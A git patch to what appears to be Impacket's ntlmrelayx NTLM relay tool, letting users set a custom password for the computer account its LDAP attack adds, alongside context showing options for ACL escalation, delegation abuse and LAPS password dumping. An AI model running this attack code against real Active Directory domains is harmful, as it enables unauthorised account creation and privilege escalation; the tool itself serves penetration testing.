From 85f322d719e62f3bca3b0d394c6d3aace0248102 Mon Sep 17 00:00:00 2001
From: ShutdownRepo <nwodtuhs@pm.me>
Date: Wed, 29 Apr 2020 12:00:13 +0200
Subject: [PATCH 1/1] User-defined password for LDAP attack addComputer - users
 can define a custom password for the LDAP attack addComputer - edited the
 random generation of passwords for addComputer and addUser in order to remove
 some inconvenient special chars like quotes

---
 examples/ntlmrelayx.py                          |  2 +-
 .../examples/ntlmrelayx/attacks/ldapattack.py   | 17 +++++++++++------
 2 files changed, 12 insertions(+), 7 deletions(-)

diff --git a/examples/ntlmrelayx.py b/examples/ntlmrelayx.py
index c53da8fa..f56b73e7 100755
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -283,7 +283,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
     ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
     ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
-    ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
+    ldapoptions.add_argument('--add-computer', action='store', metavar=('COMPUTERNAME', 'PASSWORD'), required=False, nargs='*', help='Attempt to add a new computer account')
     ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
     ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
     ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
diff --git a/impacket/examples/ntlmrelayx/attacks/ldapattack.py b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
index 73211983..7c6b04c4 100644
--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -109,7 +109,8 @@ class LDAPAttack(ProtocolAttack):
     GENERIC_ALL             = 0x000F01FF
 
     def __init__(self, config, LDAPClient, username):
-        self.computerName = '' if config.addcomputer == 'Rand' else config.addcomputer
+        self.computerName = '' if not config.addcomputer else config.addcomputer[0]
+        self.computerPassword = '' if not config.addcomputer or len(config.addcomputer) < 2 else config.addcomputer[1]
         ProtocolAttack.__init__(self, config, LDAPClient, username)
         if self.config.interactive:
             # Launch locally listening interactive shell.
@@ -125,9 +126,6 @@ class LDAPAttack(ProtocolAttack):
             LOG.error('New computer already added. Refusing to add another')
             return
 
-        # Random password
-        newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
-
         # Get the domain we are in
         domaindn = domainDumper.root
         domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
@@ -139,6 +137,13 @@ class LDAPAttack(ProtocolAttack):
         else:
             newComputer = computerName if computerName.endswith('$') else computerName + '$'
 
+        computerPassword = self.computerPassword
+        if not computerPassword:
+            # Random password
+            newPassword = ''.join(random.choice(string.ascii_letters + string.digits + '.,;:!$-_+/*(){}#@<>^') for _ in range(15))
+        else:
+            newPassword = computerPassword
+
         computerHostname = newComputer[:-1]
         newComputerDn = ('CN=%s,%s' % (computerHostname, parent)).encode('utf-8')
 
@@ -183,7 +188,7 @@ class LDAPAttack(ProtocolAttack):
             return
 
         # Random password
-        newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
+        newPassword = ''.join(random.choice(string.ascii_letters + string.digits + '.,;:!$-_+/*(){}#@<>^') for _ in range(15))
 
         # Random username
         newUser = ''.join(random.choice(string.ascii_letters) for _ in range(10))
@@ -635,7 +640,7 @@ class LDAPAttack(ProtocolAttack):
             LOG.info("Attempting to dump LAPS passwords")
 
             success = self.client.search(domainDumper.root, '(&(objectCategory=computer))', search_scope=ldap3.SUBTREE, attributes=['DistinguishedName','ms-MCS-AdmPwd'])
-            
+
             if success:
 
                 fd = None
-- 
2.25.0

